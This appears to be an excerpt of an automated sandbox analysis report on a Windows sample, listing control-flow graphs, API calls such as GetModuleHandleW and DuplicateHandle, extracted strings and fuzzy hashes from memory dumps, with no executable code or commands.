                                                                                                                            control_flow_graph 1065 595bac8-595bae9 1066 595baf0-595bbdc 1065->1066 1067 595baeb 1065->1067 1069 595c404-595c42c 1066->1069 1070 595bbe2-595bd33 1066->1070 1067->1066 1073 595cb09-595cb12 1069->1073 1114 595c3d2-595c402 1070->1114 1115 595bd39-595bd94 1070->1115 1075 595cb18-595cb2f 1073->1075 1076 595c43a-595c443 1073->1076 1077 595c445 1076->1077 1078 595c44a-595c52b 1076->1078 1077->1078 1095 595c531-595c53e 1078->1095 1096 595c540-595c54c 1095->1096 1097 595c568 1095->1097 1099 595c556-595c55c 1096->1099 1100 595c54e-595c554 1096->1100 1101 595c56e-595c58e 1097->1101 1102 595c566 1099->1102 1100->1102 1105 595c590-595c5e9 1101->1105 1106 595c5ee-595c664 1101->1106 1102->1101 1118 595cb06-595cb08 1105->1118 1127 595c666-595c6b7 1106->1127 1128 595c6b9-595c6fc call 595b670 1106->1128 1114->1069 1122 595bd96 1115->1122 1123 595bd99-595bda4 1115->1123 1118->1073 1122->1123 1126 595c2e8-595c2ee 1123->1126 1129 595c2f4-595c371 1126->1129 1130 595bda9-595bdc7 1126->1130 1158 595c707-595c70d 1127->1158 1128->1158 1172 595c3be-595c3c4 1129->1172 1134 595be1e-595be33 1130->1134 1135 595bdc9-595bdcd 1130->1135 1136 595be35 1134->1136 1137 595be3a-595be50 1134->1137 1135->1134 1139 595bdcf-595bdda 1135->1139 1136->1137 1143 595be57-595be6e 1137->1143 1144 595be52 1137->1144 1146 595be10-595be16 1139->1146 1149 595be75-595be8b 1143->1149 1150 595be70 1143->1150 1144->1143 1147 595bddc-595bde0 1146->1147 1148 595be18-595be19 1146->1148 1154 595bde6-595bdfe 1147->1154 1155 595bde2 1147->1155 1152 595be9c-595bf0d 1148->1152 1156 595be92-595be99 1149->1156 1157 595be8d 1149->1157 1150->1149 1159 595bf23-595c09b 1152->1159 1160 595bf0f 1152->1160 1162 595be05-595be0d 1154->1162 1163 595be00 1154->1163 1155->1154 1156->1152 1157->1156 1164 595c764-595c770 1158->1164 1173 595c0b1-595c1ec 1159->1173 1174 595c09d 1159->1174 1160->1159 1165 595bf11-595bf1d 1160->1165 1162->1146 1163->1162 1166 595c772-595c7fa 1164->1166 1167 595c70f-595c731 1164->1167 1165->1159 1197 595c97b-595c984 1166->1197 1170 595c733 1167->1170 1171 595c738-595c761 1167->1171 1170->1171 1171->1164 1177 595c3c6 1172->1177 1178 595c373-595c3bb 1172->1178 1187 595c250-595c265 1173->1187 1188 595c1ee-595c1f2 1173->1188 1174->1173 1179 595c09f-595c0ab 1174->1179 1177->1114 1178->1172 1179->1173 1189 595c267 1187->1189 1190 595c26c-595c28d 1187->1190 1188->1187 1191 595c1f4-595c203 1188->1191 1189->1190 1194 595c294-595c2b3 1190->1194 1195 595c28f 1190->1195 1196 595c242-595c248 1191->1196 1202 595c2b5 1194->1202 1203 595c2ba-595c2da 1194->1203 1195->1194 1198 595c205-595c209 1196->1198 1199 595c24a-595c24b 1196->1199 1200 595c7ff-595c814 1197->1200 1201 595c98a-595c9e5 1197->1201 1209 595c213-595c234 1198->1209 1210 595c20b-595c20f 1198->1210 1208 595c2e5 1199->1208 1204 595c816 1200->1204 1205 595c81d-595c969 1200->1205 1225 595c9e7-595ca1a 1201->1225 1226 595ca1c-595ca46 1201->1226 1202->1203 1206 595c2e1 1203->1206 1207 595c2dc 1203->1207 1204->1205 1211 595c866-595c8a6 1204->1211 1212 595c8f0-595c930 1204->1212 1213 595c823-595c861 1204->1213 1214 595c8ab-595c8eb 1204->1214 1230 595c975 1205->1230 1206->1208 1207->1206 1208->1126 1215 595c236 1209->1215 1216 595c23b-595c23f 1209->1216 1210->1209 1211->1230 1212->1230 1213->1230 1214->1230 1215->1216 1216->1196 1234 595ca4f-595caff 1225->1234 1226->1234 1230->1197 1234->1118
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'q$<ov!$TJq$Teq$pq$xbq
                                                                                                                            • API String ID: 0-613785864
                                                                                                                            • Opcode ID: 7064b37bbf0f23a1e0535f7cc4ec233fb33a06f8d70b9fe5de84fcc371ab9201
                                                                                                                            • Instruction ID: 345efa3e2fefa5a01183e6a6042dd18ad224779be330287ad59bd444f7fd8466
                                                                                                                            • Opcode Fuzzy Hash: 7064b37bbf0f23a1e0535f7cc4ec233fb33a06f8d70b9fe5de84fcc371ab9201
                                                                                                                            • Instruction Fuzzy Hash: 79B2C275E00228DFDB64CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E91CF40
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (oq$(oq$,q$,q$Hq
                                                                                                                            • API String ID: 0-962059274
                                                                                                                            • Opcode ID: 92ede5ccd03a2a707a64ec37019bf55604c0d0aabe15e3c06d88caaa447c3de5
                                                                                                                            • Instruction ID: 41bf52f8cd9bbd8c69ebedaef8eddfb8794c11c5b173bb07ff6e66101d4192c6
                                                                                                                            • Opcode Fuzzy Hash: 92ede5ccd03a2a707a64ec37019bf55604c0d0aabe15e3c06d88caaa447c3de5
                                                                                                                            • Instruction Fuzzy Hash: 7A526035B002159FDB18DFB9D494A6E7BB6FF883A0B158169EC069B360DB30ED51CB90

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1240 59567c8-59567f2 1241 59567f4 1240->1241 1242 59567fb-59567ff 1240->1242 1241->1242 1243 5956816-5956831 1242->1243 1244 5956801-5956805 1242->1244 1251 5956833 1243->1251 1252 595683c-5956840 1243->1252 1245 5956ad6-5956ae1 1244->1245 1246 595680b-5956813 1244->1246 1253 5956ae8-5956b4c 1245->1253 1246->1243 1251->1252 1254 5956842-5956848 1252->1254 1255 595684b-595686f 1252->1255 1275 5956b53-5956bb7 1253->1275 1254->1255 1262 5956875-595687a 1255->1262 1263 5956a0a-5956a1c 1255->1263 1344 595687d call 5956ca5 1262->1344 1345 595687d call 5956ca0 1262->1345 1346 5956a1f call 59570a0 1263->1346 1347 5956a1f call 59571df 1263->1347 1348 5956a1f call 595708f 1263->1348 1265 5956883-5956887 1265->1253 1268 595688d-5956891 1265->1268 1266 5956a25 1269 5956ac7-5956ace 1266->1269 1268->1253 1270 5956897-59568a1 1268->1270 1274 59568a7-59568ab 1270->1274 1270->1275 1274->1263 1276 59568b1-59568b5 1274->1276 1306 5956bbe-5956c22 1275->1306 1279 59568c4-59568c8 1276->1279 1280 59568b7-59568be 1276->1280 1281 59568ce-59568de 1279->1281 1282 5956c29-5956c4b 1279->1282 1280->1263 1280->1279 1286 59568e0-59568e6 1281->1286 1287 595690e-5956914 1281->1287 1289 5956c4d-5956c59 1282->1289 1290 5956c88 1282->1290 1291 59568e8 1286->1291 1292 59568ea-59568f6 1286->1292 1293 5956916 1287->1293 1294 5956918-5956924 1287->1294 1289->1290 1302 5956c5b-5956c64 1289->1302 1295 5956c8a-5956c8d 1290->1295 1296 59568f8-5956908 1291->1296 1292->1296 1297 5956926-5956944 1293->1297 1294->1297 1296->1287 1296->1306 1297->1263 1307 595694a-595694c 1297->1307 1302->1290 1312 5956c66-5956c74 1302->1312 1306->1282 1309 5956967-595696b 1307->1309 1310 595694e-5956962 1307->1310 1309->1263 1314 5956971-595697b 1309->1314 1310->1269 1312->1290 1319 5956c76-5956c84 1312->1319 1314->1263 1322 5956981-5956987 1314->1322 1319->1290 1328 5956c86 1319->1328 1323 5956ad1 1322->1323 1324 595698d-5956990 1322->1324 1323->1245 1324->1282 1327 5956996-59569b3 1324->1327 1333 59569b5-59569d0 1327->1333 1334 59569f1-5956a05 1327->1334 1328->1295 1341 59569d2-59569d6 1333->1341 1342 59569d8-59569ec 1333->1342 1334->1269 1341->1263 1341->1342 1342->1269 1344->1265 1345->1265 1346->1266 1347->1266 1348->1266
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (oq$(oq$,q$,q$Hq$d8q
                                                                                                                            • API String ID: 0-1413554700
                                                                                                                            • Opcode ID: d2f0c171229859f9a8c6bdd6e23dd3233d909cbeebe4266fa1f9b153e33f2dc1
                                                                                                                            • Instruction ID: ad2f94ee9c9d513a029384329d84bc033c6873fc58ea50e06acb402f4a694b51
                                                                                                                            • Opcode Fuzzy Hash: d2f0c171229859f9a8c6bdd6e23dd3233d909cbeebe4266fa1f9b153e33f2dc1
                                                                                                                            • Instruction Fuzzy Hash: FCC12F30B002199FDB54DF69D958AAE7BB6FF88750F648029E906DB390DB30DC51CB91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1609 59567b7-59567f2 1611 59567f4 1609->1611 1612 59567fb-59567ff 1609->1612 1611->1612 1613 5956816-5956831 1612->1613 1614 5956801-5956805 1612->1614 1621 5956833 1613->1621 1622 595683c-5956840 1613->1622 1615 5956ad6-5956ae1 1614->1615 1616 595680b-5956813 1614->1616 1623 5956ae8-5956b4c 1615->1623 1616->1613 1621->1622 1624 5956842-5956848 1622->1624 1625 595684b-595686f 1622->1625 1645 5956b53-5956bb7 1623->1645 1624->1625 1632 5956875-595687a 1625->1632 1633 5956a0a-5956a1c 1625->1633 1714 595687d call 5956ca5 1632->1714 1715 595687d call 5956ca0 1632->1715 1716 5956a1f call 59570a0 1633->1716 1717 5956a1f call 59571df 1633->1717 1718 5956a1f call 595708f 1633->1718 1635 5956883-5956887 1635->1623 1638 595688d-5956891 1635->1638 1636 5956a25 1639 5956ac7-5956ace 1636->1639 1638->1623 1640 5956897-59568a1 1638->1640 1644 59568a7-59568ab 1640->1644 1640->1645 1644->1633 1646 59568b1-59568b5 1644->1646 1676 5956bbe-5956c22 1645->1676 1649 59568c4-59568c8 1646->1649 1650 59568b7-59568be 1646->1650 1651 59568ce-59568de 1649->1651 1652 5956c29-5956c4b 1649->1652 1650->1633 1650->1649 1656 59568e0-59568e6 1651->1656 1657 595690e-5956914 1651->1657 1659 5956c4d-5956c59 1652->1659 1660 5956c88 1652->1660 1661 59568e8 1656->1661 1662 59568ea-59568f6 1656->1662 1663 5956916 1657->1663 1664 5956918-5956924 1657->1664 1659->1660 1672 5956c5b-5956c64 1659->1672 1665 5956c8a-5956c8d 1660->1665 1666 59568f8-5956908 1661->1666 1662->1666 1667 5956926-5956944 1663->1667 1664->1667 1666->1657 1666->1676 1667->1633 1677 595694a-595694c 1667->1677 1672->1660 1682 5956c66-5956c74 1672->1682 1676->1652 1679 5956967-595696b 1677->1679 1680 595694e-5956962 1677->1680 1679->1633 1684 5956971-595697b 1679->1684 1680->1639 1682->1660 1689 5956c76-5956c84 1682->1689 1684->1633 1692 5956981-5956987 1684->1692 1689->1660 1698 5956c86 1689->1698 1693 5956ad1 1692->1693 1694 595698d-5956990 1692->1694 1693->1615 1694->1652 1697 5956996-59569b3 1694->1697 1703 59569b5-59569d0 1697->1703 1704 59569f1-5956a05 1697->1704 1698->1665 1711 59569d2-59569d6 1703->1711 1712 59569d8-59569ec 1703->1712 1704->1639 1711->1633 1711->1712 1712->1639 1714->1635 1715->1635 1716->1636 1717->1636 1718->1636
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (oq$,q
                                                                                                                            • API String ID: 0-4181827003
                                                                                                                            • Opcode ID: 3848ee6f9c3d9187411ceff515aba49397d08f75afa978356230c1748697f1f2
                                                                                                                            • Instruction ID: 40c574990eaac16d9a054714150fa0da8600fb0b8b0b9512c9a447b54e0a0f93
                                                                                                                            • Opcode Fuzzy Hash: 3848ee6f9c3d9187411ceff515aba49397d08f75afa978356230c1748697f1f2
                                                                                                                            • Instruction Fuzzy Hash: A8512B30A01219DFCB24CF69D988AADBBF5FF48725F648469E905AB260D730E894CB50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1719 2d6b048-2d6b057 1720 2d6b083-2d6b087 1719->1720 1721 2d6b059-2d6b066 call 2d69ab8 1719->1721 1723 2d6b09b-2d6b0dc 1720->1723 1724 2d6b089-2d6b093 1720->1724 1727 2d6b07c 1721->1727 1728 2d6b068-2d6b076 call 2d6b2e0 1721->1728 1730 2d6b0de-2d6b0e6 1723->1730 1731 2d6b0e9-2d6b0f7 1723->1731 1724->1723 1727->1720 1728->1727 1737 2d6b1b8-2d6b278 1728->1737 1730->1731 1732 2d6b11b-2d6b11d 1731->1732 1733 2d6b0f9-2d6b0fe 1731->1733 1738 2d6b120-2d6b127 1732->1738 1735 2d6b100-2d6b107 call 2d6ad00 1733->1735 1736 2d6b109 1733->1736 1740 2d6b10b-2d6b119 1735->1740 1736->1740 1769 2d6b280-2d6b2ab GetModuleHandleW 1737->1769 1770 2d6b27a-2d6b27d 1737->1770 1741 2d6b134-2d6b13b 1738->1741 1742 2d6b129-2d6b131 1738->1742 1740->1738 1745 2d6b13d-2d6b145 1741->1745 1746 2d6b148-2d6b151 call 2d6ad10 1741->1746 1742->1741 1745->1746 1750 2d6b153-2d6b15b 1746->1750 1751 2d6b15e-2d6b163 1746->1751 1750->1751 1752 2d6b165-2d6b16c 1751->1752 1753 2d6b181-2d6b185 1751->1753 1752->1753 1755 2d6b16e-2d6b17e call 2d6ad20 call 2d6ad30 1752->1755 1774 2d6b188 call 2d6b5e0 1753->1774 1775 2d6b188 call 2d6b5b0 1753->1775 1755->1753 1758 2d6b18b-2d6b18e 1760 2d6b190-2d6b1ae 1758->1760 1761 2d6b1b1-2d6b1b7 1758->1761 1760->1761 1771 2d6b2b4-2d6b2c8 1769->1771 1772 2d6b2ad-2d6b2b3 1769->1772 1770->1769 1772->1771 1774->1758 1775->1758
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02D6B29E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1373161789.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_2d60000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            • Opcode ID: 51155dc1cb1c796cbe18506a758e89acfb851c74f82b974d782dc32d26c2f471
                                                                                                                            • Instruction ID: 642854d60e8a36132b3339339eff37afe6f6966a16a3753b6b43ab9f3e1d60fe
                                                                                                                            • Opcode Fuzzy Hash: 51155dc1cb1c796cbe18506a758e89acfb851c74f82b974d782dc32d26c2f471
                                                                                                                            • Instruction Fuzzy Hash: EA811470A00B059FD764DF29D4557AABBF1FF88208F10892ED48AE7B40DB75E845CB91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1777 2d644b4-2d659b9 CreateActCtxA 1780 2d659c2-2d65a1c 1777->1780 1781 2d659bb-2d659c1 1777->1781 1788 2d65a1e-2d65a21 1780->1788 1789 2d65a2b-2d65a2f 1780->1789 1781->1780 1788->1789 1790 2d65a40-2d65a70 1789->1790 1791 2d65a31-2d65a3d 1789->1791 1795 2d65a22-2d65a2c 1790->1795 1796 2d65a72-2d65af4 1790->1796 1791->1790 1797 2d659ce-2d659cf 1795->1797 1798 2d65a2e-2d65a3d 1795->1798 1797->1795 1798->1790
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02D659A9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1373161789.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_2d60000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 6c438e37f528776ab9ff5c5831ce279fb1a273c2edc5c895d36f3e0e83743988
                                                                                                                            • Instruction ID: 49308bbb280b4cba77182c500671f3a36f51fee6ab94e65fec1f8e003b0248d4
                                                                                                                            • Opcode Fuzzy Hash: 6c438e37f528776ab9ff5c5831ce279fb1a273c2edc5c895d36f3e0e83743988
                                                                                                                            • Instruction Fuzzy Hash: EC41B070C04719CFEB24DFA9C844B9EBBB6BF49304F64806AD409AB251DB756949CF90

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1800 2d658f3-2d659b9 CreateActCtxA 1802 2d659c2-2d65a1c 1800->1802 1803 2d659bb-2d659c1 1800->1803 1810 2d65a1e-2d65a21 1802->1810 1811 2d65a2b-2d65a2f 1802->1811 1803->1802 1810->1811 1812 2d65a40-2d65a70 1811->1812 1813 2d65a31-2d65a3d 1811->1813 1817 2d65a22-2d65a2c 1812->1817 1818 2d65a72-2d65af4 1812->1818 1813->1812 1819 2d659ce-2d659cf 1817->1819 1820 2d65a2e-2d65a3d 1817->1820 1819->1817 1820->1812
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02D659A9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1373161789.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_2d60000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 103b6bd494034810b02a3c5e8b02b27e280870f04d9fc2ce79cdd1528c3c2ffc
                                                                                                                            • Instruction ID: 4fe89cccc57cdc655474b794dbba8f45573f9ed26fc53778ba8c6135f83e7bb4
                                                                                                                            • Opcode Fuzzy Hash: 103b6bd494034810b02a3c5e8b02b27e280870f04d9fc2ce79cdd1528c3c2ffc
                                                                                                                            • Instruction Fuzzy Hash: 7241C170C04719CFEB28DFA9C844B9DBBB6BF49304F24806AD409AB251D7756949CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1822 2d6af34-2d6d5bc DuplicateHandle 1824 2d6d5c5-2d6d5e2 1822->1824 1825 2d6d5be-2d6d5c4 1822->1825 1825->1824
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D6D4EE,?,?,?,?,?), ref: 02D6D5AF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1373161789.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_2d60000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: 1950fd0fd6997d7b5199e5de2008bc2114e7bf988a647beca796bb6b887a7205
                                                                                                                            • Instruction ID: 1313e9648042bd5941c5f4d4dc48dccff734b2726ab380a1b14595919bdaa7b0
                                                                                                                            • Opcode Fuzzy Hash: 1950fd0fd6997d7b5199e5de2008bc2114e7bf988a647beca796bb6b887a7205
                                                                                                                            • Instruction Fuzzy Hash: 552114B5D00248EFDB10CF9AD584AEEBFF5EB48310F10801AE918A7310D378AA44CFA5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1828 2d6d520-2d6d5bc DuplicateHandle 1829 2d6d5c5-2d6d5e2 1828->1829 1830 2d6d5be-2d6d5c4 1828->1830 1830->1829
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D6D4EE,?,?,?,?,?), ref: 02D6D5AF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1373161789.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_2d60000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: c329c08e5d1916f4b0130309fa6dec23b15db10d816cb1b41e359ae5eed64eef
                                                                                                                            • Instruction ID: e6e8daa105fb4d07bef687039e85b7ff794ce5c533f4120a3bbd3d1063e1f47a
                                                                                                                            • Opcode Fuzzy Hash: c329c08e5d1916f4b0130309fa6dec23b15db10d816cb1b41e359ae5eed64eef
                                                                                                                            • Instruction Fuzzy Hash: 8A21E4B5D00248DFDB10CFAAD984AEEBFF5EB48310F14801AE958A7750D379A944CFA1

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1833 2d6b238-2d6b278 1834 2d6b280-2d6b2ab GetModuleHandleW 1833->1834 1835 2d6b27a-2d6b27d 1833->1835 1836 2d6b2b4-2d6b2c8 1834->1836 1837 2d6b2ad-2d6b2b3 1834->1837 1835->1834 1837->1836
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02D6B29E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1373161789.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_2d60000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            • Opcode ID: c4629a8989fc18382f8ad469159551fe2af3aed9e15643ee128d65c2e8cdbbdf
                                                                                                                            • Instruction ID: 508f085d0fba022b924cf40b6ca7d394005a6448acdcb69f96c71206b8cdf372
                                                                                                                            • Opcode Fuzzy Hash: c4629a8989fc18382f8ad469159551fe2af3aed9e15643ee128d65c2e8cdbbdf
                                                                                                                            • Instruction Fuzzy Hash: 4311DFB6C006498FDB20CF9AC544BDEFBF4EB88318F10841AD829A7710D379A545CFA5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1892 595db28-595db4d 1893 595db54-595db6e 1892->1893 1894 595db4f 1892->1894 1896 595db70-595db73 1893->1896 1894->1893 1897 595db76-595db7c 1896->1897 1898 595db85-595db86 1897->1898 1899 595db7e 1897->1899 1900 595db88-595dba0 1898->1900 1899->1900 1901 595dbe7-595dc65 call 595d6b8 1899->1901 1905 595dba9-595dbb0 1900->1905 1901->1897 1920 595dc6b-595dc6c 1901->1920 1906 595dbd1 1905->1906 1907 595dbb2-595dbbb 1905->1907 1909 595dbd4-595dbe6 1906->1909 1910 595dbc2-595dbc5 1907->1910 1911 595dbbd-595dbc0 1907->1911 1912 595dbcf 1910->1912 1911->1912 1912->1909 1920->1896
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8q
                                                                                                                            • API String ID: 0-4083045702
                                                                                                                            • Opcode ID: d93eb6d4717c1749e29da7609ad1981b0f60ebda71bdda722dd989f14c916c32
                                                                                                                            • Instruction ID: 639ed3958fcef023c11398d428f2a0713dd2730e54103be2bd292ac9c9633c65
                                                                                                                            • Opcode Fuzzy Hash: d93eb6d4717c1749e29da7609ad1981b0f60ebda71bdda722dd989f14c916c32
                                                                                                                            • Instruction Fuzzy Hash: 63411974E0520DDFDB04EFA9D454AEEBBBBFB89320F109429E806A7354CB305A55CB51

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1921 595db19-595db4d 1923 595db54-595db6e 1921->1923 1924 595db4f 1921->1924 1926 595db70-595db73 1923->1926 1924->1923 1927 595db76-595db7c 1926->1927 1928 595db85-595db86 1927->1928 1929 595db7e 1927->1929 1930 595db88-595dba0 1928->1930 1929->1930 1931 595dbe7-595dc65 call 595d6b8 1929->1931 1935 595dba9-595dbb0 1930->1935 1931->1927 1950 595dc6b-595dc6c 1931->1950 1936 595dbd1 1935->1936 1937 595dbb2-595dbbb 1935->1937 1939 595dbd4-595dbe6 1936->1939 1940 595dbc2-595dbc5 1937->1940 1941 595dbbd-595dbc0 1937->1941 1942 595dbcf 1940->1942 1941->1942 1942->1939 1950->1926
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8q
                                                                                                                            • API String ID: 0-4083045702
                                                                                                                            • Opcode ID: db39cf7dbf9c95c34e54fd887498b073c0b7e60bb4aca7cc8524ae70cded3903
                                                                                                                            • Instruction ID: 5f63f07e9c0e2b220fac8e67f59ceffe7ca1c4c8ef90da8cd869a7a3b9a379eb
                                                                                                                            • Opcode Fuzzy Hash: db39cf7dbf9c95c34e54fd887498b073c0b7e60bb4aca7cc8524ae70cded3903
                                                                                                                            • Instruction Fuzzy Hash: CC413774E0520DDFDB04EFA9D884AEEBBBAFB89310F109429E805A7354DB305A55CB51

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1951 595d110-595d118 1952 595d196-595d1aa 1951->1952 1953 595d11a-595d142 1951->1953 1958 595d1b3-595d37c 1952->1958 1971 595d1ad call 595d538 1952->1971 1972 595d1ad call 595d528 1952->1972 1956 595d144 1953->1956 1957 595d149-595d1aa 1953->1957 1956->1957 1969 595d1ad call 595d538 1957->1969 1970 595d1ad call 595d528 1957->1970 1969->1958 1970->1958 1971->1958 1972->1958
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LRq
                                                                                                                            • API String ID: 0-3187445251
                                                                                                                            • Opcode ID: dac2b84c33f31854d0c314b204802e1b74a4b61b5d5c90603ccd8eff4a9e8dfb
                                                                                                                            • Instruction ID: ce78136207574aac2511e705fbdd349849dae3f5e494d00b8d43d705ed36b5ed
                                                                                                                            • Opcode Fuzzy Hash: dac2b84c33f31854d0c314b204802e1b74a4b61b5d5c90603ccd8eff4a9e8dfb
                                                                                                                            • Instruction Fuzzy Hash: F3316E74E192188FCB48CFAAC8446EEBBF6FF89310F10902AD805AB395DB345906CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LRq
                                                                                                                            • API String ID: 0-3187445251
                                                                                                                            • Opcode ID: 9c09ca59a62321f9ec1c701be16f5fb685ae5be1f906b622110866a9614010fe
                                                                                                                            • Instruction ID: fbfa9defa6fd5fef6d4ef6049f94fdd6b8ee3ff518a5fb1bb22a9682c4b874b7
                                                                                                                            • Opcode Fuzzy Hash: 9c09ca59a62321f9ec1c701be16f5fb685ae5be1f906b622110866a9614010fe
